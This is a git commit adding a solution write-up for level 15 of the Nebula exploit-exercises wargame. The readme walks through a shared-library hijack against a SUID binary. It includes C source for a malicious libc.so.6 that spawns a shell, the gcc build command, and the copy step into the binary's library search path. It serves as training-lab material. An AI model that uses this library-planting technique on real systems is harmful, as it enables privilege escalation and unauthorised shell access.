Commit b0e8918

Richard Luby <richluby@gmail.com>
2016-10-14 11:05:22
added solution for level 15
this solution requires loading a malicious library to gain a shell. Note that /bin/bash should not be used as bash 2 tends to drop privileges if executed from SUID
master
1 parent 27e922b
Changed files (2)
exploit_exercises
nebula
level15
readme.md
completions.md
exploit_exercises/nebula/level15/readme.md
@@ -1,14 +1,42 @@
 
-----------------------------------------------
+# Nebula - Level 15 - Library Loading
 
-About
-Source code
-strace the binary at /home/flag15/flag15 and see if you spot anything out
+## About
+
+`strace` the binary at `/home/flag15/flag15` and see if you spot anything out
 of the ordinary.
 You may wish to review how to “compile a shared library in linux” and how the
-libraries are loaded and processed by reviewing the dlopen manpage in
+libraries are loaded and processed by reviewing the `dlopen` manpage in
 depth.
 Clean up after yourself :)
-To do this level, log in as the level15 account with the password
-level15. Files for this level can be found in /home/flag15.
-There is no source code available for this level
+To do this level, log in as the `level15` account with the password
+`level15`. Files for this level can be found in `/home/flag15`.
+
+## Solution
+
+Running `strace` shows that the binary searches for several libraries in the folder
+`/var/tmp/flag15/*` We use this information to populate the necessary libraries for the program
+by crafting a custom `libc.so.6`. Create a file `run.sh` with `/bin/bash` as the contents. Create the
+shared library `libc.c` with the contents
+
+```
+#include <unistd.h>
+#include <stdio.h>
+#include <sys/syscall.h>
+
+void __cxa_finalize(void *d){
+	return;
+}
+
+int __libcc_start_main(int (*main) (int, char**, char**), int argc, char** ubp_av, void (*init) (void), void (*fini) (void), void (*rtld_fini) (void), void (* stack_end)){
+	char* args[] = {"/bin/sh", "/home/level15/run.sh"};
+	execve("/bin/sh", args);
+	return 0;
+}
+```
+Compile the library with
+`gcc -fPIC -g -c -Wall /home/level15/libc.c && gcc -shared -Wl,-Bstatic,-soname,libc.so.6,--version-script,version
+-o libc.so.6 libc.o -L/usr/lib/i386-linux-gnu -static-libgcc`
+and then copy it to the correct directory: `cp libc.so.6 /var/tmp/flag15/tls/i686/sse2/libc.so.6`.
+Execute the program to get a shell. Note that `/bin/bash` MUST NOT be used as `bash` will often attempt
+to [drop privileges](https://linux.die.net/man/3/system) when executing.
exploit_exercises/nebula/completions.md
@@ -3,4 +3,4 @@
 Handle               |Level00 |Level01 |Level02 |Level03 |Level04 |Level05 |Level06 |Level07 |Level08 |Level09 |Level10 |Level11 |Level12 |Level13 |Level14 |Level15 |Level16 |Level17 |Level18 |Level19
 ---------------------|--------|--------|--------|--------|--------|--------|--------|--------|--------|--------|--------|--------|--------|--------|--------|--------|--------|--------|--------|-------
 **bryfry**           | [x]    |        | [x]    |        | [x]    |        | [x]    |        |        |        |        |        |        |        |        |        |        |        |        |        
-**richluby**         |        | [x]    |        | [x]    |        | [x]    |        | [x]    |        | [x]    | [x]    | [x]    | [x]    | [x]    | [x]    |        |        |        |        |        
+**richluby**         |        | [x]    |        | [x]    |        | [x]    |        | [x]    |        | [x]    | [x]    | [x]    | [x]    | [x]    | [x]    | [x]    |        |        |        |